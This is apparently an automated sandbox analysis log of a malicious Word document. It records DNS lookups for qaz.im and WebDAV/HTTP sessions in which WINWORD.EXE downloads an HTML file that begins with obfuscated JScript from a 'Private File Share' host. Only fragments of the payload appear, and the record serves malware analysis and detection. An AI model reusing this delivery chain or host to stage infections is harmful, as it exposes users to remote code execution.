Sep 2, 2022 13:24:18.659006119 CEST | 192.168.2.22 | 8.8.8.8 | 0xa259 | Standard query (0) | qaz.im | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:22.043364048 CEST | 192.168.2.22 | 8.8.8.8 | 0xf2ca | Standard query (0) | qaz.im | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:22.122073889 CEST | 192.168.2.22 | 8.8.8.8 | 0xdc64 | Standard query (0) | qaz.im | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:22.896694899 CEST | 192.168.2.22 | 8.8.8.8 | 0x646c | Standard query (0) | qaz.im | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:22.924175978 CEST | 192.168.2.22 | 8.8.8.8 | 0x12f1 | Standard query (0) | qaz.im | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:26.515650988 CEST | 192.168.2.22 | 8.8.8.8 | 0x25fe | Standard query (0) | qaz.im | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:26.538368940 CEST | 192.168.2.22 | 8.8.8.8 | 0x9bb1 | Standard query (0) | qaz.im | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 2, 2022 13:24:11.871222019 CEST | 8.8.8.8 | 192.168.2.22 | 0xfbc4 | No error (0) | qaz.im |  | 82.202.173.45 | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:18.653536081 CEST | 8.8.8.8 | 192.168.2.22 | 0xd915 | No error (0) | qaz.im |  | 82.202.173.45 | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:18.722076893 CEST | 8.8.8.8 | 192.168.2.22 | 0xa259 | No error (0) | qaz.im |  | 82.202.173.45 | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:22.110351086 CEST | 8.8.8.8 | 192.168.2.22 | 0xf2ca | No error (0) | qaz.im |  | 82.202.173.45 | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:22.185585976 CEST | 8.8.8.8 | 192.168.2.22 | 0xdc64 | No error (0) | qaz.im |  | 82.202.173.45 | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:22.916980028 CEST | 8.8.8.8 | 192.168.2.22 | 0x646c | No error (0) | qaz.im |  | 82.202.173.45 | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:23.003745079 CEST | 8.8.8.8 | 192.168.2.22 | 0x12f1 | No error (0) | qaz.im |  | 82.202.173.45 | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:26.535551071 CEST | 8.8.8.8 | 192.168.2.22 | 0x25fe | No error (0) | qaz.im |  | 82.202.173.45 | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:26.556077957 CEST | 8.8.8.8 | 192.168.2.22 | 0x9bb1 | No error (0) | qaz.im |  | 82.202.173.45 | A (IP address) | IN (0x0001)
  • qaz.im
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49171 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:12 UTC | 0 | OUT | OPTIONS /load/diy5AH/ HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: qaz.im
Content-Length: 0
Connection: Keep-Alive
2022-09-02 11:24:12 UTC | 0 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Set-Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49172 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:18 UTC | 0 | OUT | HEAD /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft Office Existence Discovery
Host: qaz.im
2022-09-02 11:24:19 UTC | 0 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:18 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.22 | 49181 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:25 UTC | 22 | OUT | GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: qaz.im
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:25 UTC | 23 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"
Data Ascii: <!docTYpe HTML><hTml><bODy><sCriPT LanGuagE="jSCript">//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.22 | 49182 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:25 UTC | 42 | OUT | HEAD /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: qaz.im
Content-Length: 0
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:25 UTC | 42 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.22 | 49183 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:26 UTC | 43 | OUT | OPTIONS /load/diy5AH/ HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: qaz.im
Content-Length: 0
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:26 UTC | 43 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.22 | 49184 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:26 UTC | 43 | OUT | HEAD /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft Office Existence Discovery
Host: qaz.im
2022-09-02 11:24:26 UTC | 43 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:26 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.22 | 49185 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:27 UTC | 44 | OUT | PROPFIND /load/diy5AH HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: qaz.im
2022-09-02 11:24:27 UTC | 44 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.22 | 49186 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:27 UTC | 44 | OUT | PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: qaz.im
2022-09-02 11:24:27 UTC | 44 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.22 | 49187 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:27 UTC | 49 | OUT | PROPFIND /load/diy5AH HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: qaz.im
2022-09-02 11:24:27 UTC | 49 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.22 | 49188 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:27 UTC | 50 | OUT | PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: qaz.im
2022-09-02 11:24:28 UTC | 50 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.22 | 49189 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:28 UTC | 55 | OUT | GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: qaz.im
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:28 UTC | 55 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:28 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"
Data Ascii: <!docTYpe HTML><hTml><bODy><sCriPT LanGuagE="jSCript">//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.22 | 49190 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:28 UTC | 74 | OUT | HEAD /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: qaz.im
Content-Length: 0
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:29 UTC | 74 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49173 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:22 UTC | 1 | OUT | OPTIONS /load/diy5AH HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: qaz.im
2022-09-02 11:24:22 UTC | 1 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.22 | 49191 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:29 UTC | 75 | OUT | GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: qaz.im
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:29 UTC | 75 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"
Data Ascii: <!docTYpe HTML><hTml><bODy><sCriPT LanGuagE="jSCript">//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.22 | 49192 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:58 UTC | 94 | OUT | GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: qaz.im
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:58 UTC | 95 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:58 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"
Data Ascii: <!docTYpe HTML><hTml><bODy><sCriPT LanGuagE="jSCript">//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo
2022-09-02 11:24:58 UTC | 111 | IN
Data Ascii: db1nXUkaPK77D3qVcR8RaPsaER6CqSe1HlAPTKJlJI99hovArvy6zwxL0uF0dQjnoYgC9BzosXd3prM0pXdaEHrrmfopfxN9r0SQjdDUl4V6mkZp8K09Qx0uBjhv4azr69PPLBNbcvdag0wNTL05kVmHu8ob0pxiB1ROAMtv78xmh8sTTaXhMRckav38eFjUleSfMh9EtkLx0hnrn6WEPJv5s6Kn9LfwV4MX3kaIblkPjD7L6vpz3e55RiZreeC


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49174 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:22 UTC | 1 | OUT | OPTIONS /index.php?a=download&q=file_not_exist HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: qaz.im
2022-09-02 11:24:22 UTC | 1 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
2022-09-02 11:24:22 UTC | 2 | IN | Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49175 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:23 UTC | 6 | OUT | PROPFIND /load/diy5AH HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: qaz.im
2022-09-02 11:24:23 UTC | 6 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.22 | 49176 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:23 UTC | 7 | OUT | PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: qaz.im
2022-09-02 11:24:23 UTC | 7 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
2022-09-02 11:24:23 UTC | 7 | IN | Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.22 | 49177 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:23 UTC | 11 | OUT | PROPFIND /load/diy5AH HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: qaz.im
2022-09-02 11:24:23 UTC | 12 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.22 | 49178 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:24 UTC | 12 | OUT | PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: qaz.im
2022-09-02 11:24:24 UTC | 12 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
2022-09-02 11:24:24 UTC | 13 | IN | Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.22 | 49179 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:24 UTC | 17 | OUT | PROPFIND /load/diy5AH HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: qaz.im
2022-09-02 11:24:24 UTC | 17 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.22 | 49180 | 82.202.173.45 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-09-02 11:24:24 UTC | 17 | OUT | PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: qaz.im
2022-09-02 11:24:24 UTC | 18 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
2022-09-02 11:24:24 UTC | 18 | IN | Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Target ID:0
Start time:13:23:18
Start date:02/09/2022
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:0x13f860000
File size:1423704 bytes
MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

No disassembly